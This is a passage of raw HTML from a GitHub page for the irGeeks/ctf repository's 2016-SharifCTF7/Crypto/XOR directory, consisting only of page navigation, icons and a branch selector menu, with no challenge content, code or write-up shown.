value="gJ8dQvosP4a4HKFQaAJYxo6ckGXKqVVOcw6dA+TVI6Rnjx6jaMkBjleT+ngtSKbhP14WZ3LKGh/tqjss8/N4zw==" /> <input type="hidden" class="js-site-search-type-field" name="type" > <svg xmlns="http://www.w3.org/2000/svg" width="22" height="20" aria-hidden="true" class="mr-1 header-search-key-slash"><path fill="none" stroke="#979A9C" opacity=".4" d="M3.5.5h12c1.7 0 3 1.3 3 3v13c0 1.7-1.3 3-3 3h-12c-1.7 0-3-1.3-3-3v-13c0-1.7 1.3-3 3-3z"></path><path fill="#979A9C" d="M11.8 6L8 15.1h-.9L10.8 6h1z"></path></svg> <div class="Box position-absolute overflow-hidden d-none jump-to-suggestions js-jump-to-suggestions-container"> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div> <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div> <div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div> <div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div> <span>No suggested jump to results</span> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div> <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div> <div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div> <div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div> <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div> <div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this user </span> <span> All GitHub </span> <span>↵</span> </div> <div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div> <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div> <div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div> <div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div> </div> </label></form> </div></div> </div> <div class="position-relative mr-lg-3 d-lg-inline-block"> Sign in </div> Sign up </div> </div> </div> </div></header> </div> <div id="start-of-content" class="show-on-focus"></div> <div id="js-flash-container" data-turbo-replace> <template class="js-flash-template"> <div class="flash flash-full {{ className }}"> <div class="px-2" > <button autofocus class="flash-close js-flash-close" type="button" aria-label="Dismiss this message"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> <div aria-atomic="true" role="alert" class="js-flash-alert"> <div>{{ message }}</div> </div> </div></div> </template></div> <include-fragment class="js-notification-shelf-include-fragment" data-base-src="https://github.com/notifications/beta/shelf"></include-fragment> <div class="application-main " data-commit-hovercards-enabled data-discussion-hovercards-enabled data-issue-and-pr-hovercards-enabled > <div itemscope itemtype="http://schema.org/SoftwareSourceCode" class=""> <main id="js-repo-pjax-container" > <div id="repository-container-header" class="pt-3 hide-full-screen" style="background-color: var(--color-page-header-bg);" data-turbo-replace> <div class="d-flex flex-wrap flex-justify-end mb-3 px-3 px-md-4 px-lg-5" style="gap: 1rem;"> <div class="flex-auto min-width-0 width-fit mr-3"> <div class=" d-flex flex-wrap flex-items-center wb-break-word f3 text-normal"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo color-fg-muted mr-2"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <span> irGeeks </span> <span>/</span> ctf <span></span><span>Public</span> </div> </div> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-bell mr-2"> <path d="M8 16a2 2 0 0 0 1.985-1.75c.017-.137-.097-.25-.235-.25h-3.5c-.138 0-.252.113-.235.25A2 2 0 0 0 8 16ZM3 5a5 5 0 0 1 10 0v2.947c0 .05.015.098.042.139l1.703 2.555A1.519 1.519 0 0 1 13.482 13H2.518a1.516 1.516 0 0 1-1.263-2.36l1.703-2.554A.255.255 0 0 0 3 7.947Zm5-3.5A3.5 3.5 0 0 0 4.5 5v2.947c0 .346-.102.683-.294.97l-1.703 2.556a.017.017 0 0 0-.003.01l.001.006c0 .002.002.004.004.006l.006.004.007.001h10.964l.007-.001.006-.004.004-.006.001-.007a.017.017 0 0 0-.003-.01l-1.703-2.554a1.745 1.745 0 0 1-.294-.97V5A3.5 3.5 0 0 0 8 1.5Z"></path></svg>Notifications <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo-forked mr-2"> <path d="M5 5.372v.878c0 .414.336.75.75.75h4.5a.75.75 0 0 0 .75-.75v-.878a2.25 2.25 0 1 1 1.5 0v.878a2.25 2.25 0 0 1-2.25 2.25h-1.5v2.128a2.251 2.251 0 1 1-1.5 0V8.5h-1.5A2.25 2.25 0 0 1 3.5 6.25v-.878a2.25 2.25 0 1 1 1.5 0ZM5 3.25a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Zm6.75.75a.75.75 0 1 0 0-1.5.75.75 0 0 0 0 1.5Zm-3 8.75a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Z"></path></svg>Fork <span>5</span> <div data-view-component="true" class="BtnGroup d-flex"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-star v-align-text-bottom d-inline-block mr-2"> <path d="M8 .25a.75.75 0 0 1 .673.418l1.882 3.815 4.21.612a.75.75 0 0 1 .416 1.279l-3.046 2.97.719 4.192a.751.751 0 0 1-1.088.791L8 12.347l-3.766 1.98a.75.75 0 0 1-1.088-.79l.72-4.194L.818 6.374a.75.75 0 0 1 .416-1.28l4.21-.611L7.327.668A.75.75 0 0 1 8 .25Zm0 2.445L6.615 5.5a.75.75 0 0 1-.564.41l-3.097.45 2.24 2.184a.75.75 0 0 1 .216.664l-.528 3.084 2.769-1.456a.75.75 0 0 1 .698 0l2.77 1.456-.53-3.084a.75.75 0 0 1 .216-.664l2.24-2.183-3.096-.45a.75.75 0 0 1-.564-.41L8 2.694Z"></path></svg><span> Star</span> <span>9</span> <button disabled="disabled" aria-label="You must be signed in to add this repository to a list" type="button" data-view-component="true" class="btn-sm btn BtnGroup-item px-2"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg></button></div> </div> <div id="responsive-meta-container" data-turbo-replace></div> <nav data-pjax="#js-repo-pjax-container" aria-label="Repository" data-view-component="true" class="js-repo-nav js-sidenav-container-pjax js-responsive-underlinenav overflow-hidden UnderlineNav px-3 px-md-4 px-lg-5"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code UnderlineNav-octicon d-none d-sm-inline"> <path d="m11.28 3.22 4.25 4.25a.75.75 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.275-.326.749.749 0 0 1 .215-.734L13.94 8l-3.72-3.72a.749.749 0 0 1 .326-1.275.749.749 0 0 1 .734.215Zm-6.56 0a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042L2.06 8l3.72 3.72a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L.47 8.53a.75.75 0 0 1 0-1.06Z"></path></svg> <span>Code</span> <span></span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-issue-opened UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 9.5a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path><path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Z"></path></svg> <span>Issues</span> <span>0</span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-pull-request UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 3.25a2.25 2.25 0 1 1 3 2.122v5.256a2.251 2.251 0 1 1-1.5 0V5.372A2.25 2.25 0 0 1 1.5 3.25Zm5.677-.177L9.573.677A.25.25 0 0 1 10 .854V2.5h1A2.5 2.5 0 0 1 13.5 5v5.628a2.251 2.251 0 1 1-1.5 0V5a1 1 0 0 0-1-1h-1v1.646a.25.25 0 0 1-.427.177L7.177 3.427a.25.25 0 0 1 0-.354ZM3.75 2.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm0 9.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm8.25.75a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Z"></path></svg> <span>Pull requests</span> <span>0</span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-play UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Zm4.879-2.773 4.264 2.559a.25.25 0 0 1 0 .428l-4.264 2.559A.25.25 0 0 1 6 10.559V5.442a.25.25 0 0 1 .379-.215Z"></path></svg> <span>Actions</span> <span></span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-table UnderlineNav-octicon d-none d-sm-inline"> <path d="M0 1.75C0 .784.784 0 1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25ZM6.5 6.5v8h7.75a.25.25 0 0 0 .25-.25V6.5Zm8-1.5V1.75a.25.25 0 0 0-.25-.25H6.5V5Zm-13 1.5v7.75c0 .138.112.25.25.25H5v-8ZM5 5V1.5H1.75a.25.25 0 0 0-.25.25V5Z"></path></svg> <span>Projects</span> <span>0</span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-shield UnderlineNav-octicon d-none d-sm-inline"> <path d="M7.467.133a1.748 1.748 0 0 1 1.066 0l5.25 1.68A1.75 1.75 0 0 1 15 3.48V7c0 1.566-.32 3.182-1.303 4.682-.983 1.498-2.585 2.813-5.032 3.855a1.697 1.697 0 0 1-1.33 0c-2.447-1.042-4.049-2.357-5.032-3.855C1.32 10.182 1 8.566 1 7V3.48a1.75 1.75 0 0 1 1.217-1.667Zm.61 1.429a.25.25 0 0 0-.153 0l-5.25 1.68a.25.25 0 0 0-.174.238V7c0 1.358.275 2.666 1.057 3.86.784 1.194 2.121 2.34 4.366 3.297a.196.196 0 0 0 .154 0c2.245-.956 3.582-2.104 4.366-3.298C13.225 9.666 13.5 8.36 13.5 7V3.48a.251.251 0 0 0-.174-.237l-5.25-1.68ZM8.75 4.75v3a.75.75 0 0 1-1.5 0v-3a.75.75 0 0 1 1.5 0ZM9 10.5a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <span>Security</span> <include-fragment src="/irGeeks/ctf/security/overall-count" accept="text/fragment+html"></include-fragment> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-graph UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 1.75V13.5h13.75a.75.75 0 0 1 0 1.5H.75a.75.75 0 0 1-.75-.75V1.75a.75.75 0 0 1 1.5 0Zm14.28 2.53-5.25 5.25a.75.75 0 0 1-1.06 0L7 7.06 4.28 9.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.25-3.25a.75.75 0 0 1 1.06 0L10 7.94l4.72-4.72a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042Z"></path></svg> <span>Insights</span> <span></span> <div style="visibility:hidden;" data-view-component="true" class="UnderlineNav-actions js-responsive-underlinenav-overflow position-absolute pr-3 pr-md-4 pr-lg-5 right-0"> <details data-view-component="true" class="details-overlay details-reset position-relative"> <summary role="button" data-view-component="true"> <div class="UnderlineNav-item mr-0 border-0"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3ZM1.5 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Zm13 0a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path></svg> <span>More</span> </div></summary> <details-menu role="menu" data-view-component="true" class="dropdown-menu dropdown-menu-sw"> Code Issues Pull requests Actions Projects Security Insights </details-menu></details></div></nav> </div> <turbo-frame id="repo-content-turbo-frame" target="_top" data-turbo-action="advance" class=""> <div id="repo-content-pjax-container" class="repository-content " > <div class="clearfix container-xl px-3 px-md-4 px-lg-5 mt-4"> <div > <div class="file-navigation mb-3 d-flex flex-items-start"> <div class="position-relative"> <details class="js-branch-select-menu details-reset details-overlay mr-0 mb-0 " id="branch-select-menu" data-hydro-click-payload="{"event_type":"repository.click","payload":{"target":"REFS_SELECTOR_MENU","repository_id":76858104,"originating_url":"https://github.com/irGeeks/ctf/tree/master/2016-SharifCTF7/Crypto/XOR","user_id":null}}" data-hydro-click-hmac="a93e9870c8c300d08bb14c09d9e67a611aed1af5cb5feadc018829054b32a846"> <summary class="btn css-truncate" data-hotkey="w" title="Switch branches or tags"> <svg text="gray" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-branch"> <path d="M9.5 3.25a2.25 2.25 0 1 1 3 2.122V6A2.5 2.5 0 0 1 10 8.5H6a1 1 0 0 0-1 1v1.128a2.251 2.251 0 1 1-1.5 0V5.372a2.25 2.25 0 1 1 1.5 0v1.836A2.493 2.493 0 0 1 6 7h4a1 1 0 0 0 1-1v-.628A2.25 2.25 0 0 1 9.5 3.25Zm-6 0a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Zm8.25-.75a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5ZM4.25 12a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Z"></path></svg> <span>master</span> <span></span> </summary> <div class="SelectMenu"> <div class="SelectMenu-modal"> <header class="SelectMenu-header"> <span>Switch branches/tags</span> <button class="SelectMenu-closeButton" type="button" data-toggle-for="branch-select-menu"><svg aria-label="Close menu" aria-hidden="false" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg></button> </header> <input-demux data-action="tab-container-change:input-demux#storeInput tab-container-changed:input-demux#updateInput"> <tab-container class="d-flex flex-column js-branches-tags-tabs" style="min-height: 0;"> <div class="SelectMenu-filter"> <input data-target="input-demux.source" id="context-commitish-filter-field" class="SelectMenu-input form-control" aria-owns="ref-list-branches" data-controls-ref-menu-id="ref-list-branches" autofocus autocomplete="off" aria-label="Filter branches/tags" placeholder="Filter branches/tags" type="text" > </div> <div class="SelectMenu-tabs" role="tablist" data-target="input-demux.control" > <button class="SelectMenu-tab" type="button" role="tab" aria-selected="true">Branches</button> <button class="SelectMenu-tab" type="button" role="tab">Tags</button> </div> <div role="tabpanel" id="ref-list-branches" data-filter-placeholder="Filter branches/tags" tabindex="" class="d-flex flex-column flex-auto overflow-auto"> <ref-selector type="branch" data-targets="input-demux.sinks" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " query-endpoint="/irGeeks/ctf/refs" cache-key="v0:1482148525.0" current-committish="bWFzdGVy" default-branch="bWFzdGVy" name-with-owner="aXJHZWVrcy9jdGY=" prefetch-on-mouseover > <template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load branches</div> </template> <template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message">Nothing to show</div></template> <div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list " data-turbo-frame="repo-content-turbo-frame"> <div class="SelectMenu-loading pt-3 pb-0 overflow-hidden" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div> <template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template> <footer class="SelectMenu-footer">View all branches</footer> </ref-selector> </div> <div role="tabpanel" id="tags-menu" data-filter-placeholder="Find a tag" tabindex="" hidden class="d-flex flex-column flex-auto overflow-auto"> <ref-selector type="tag" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " data-targets="input-demux.sinks" query-endpoint="/irGeeks/ctf/refs" cache-key="v0:1482148525.0" current-committish="bWFzdGVy" default-branch="bWFzdGVy" name-with-owner="aXJHZWVrcy9jdGY=" > <template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load tags</div> </template> <template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Nothing to show</div> </template> <template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon 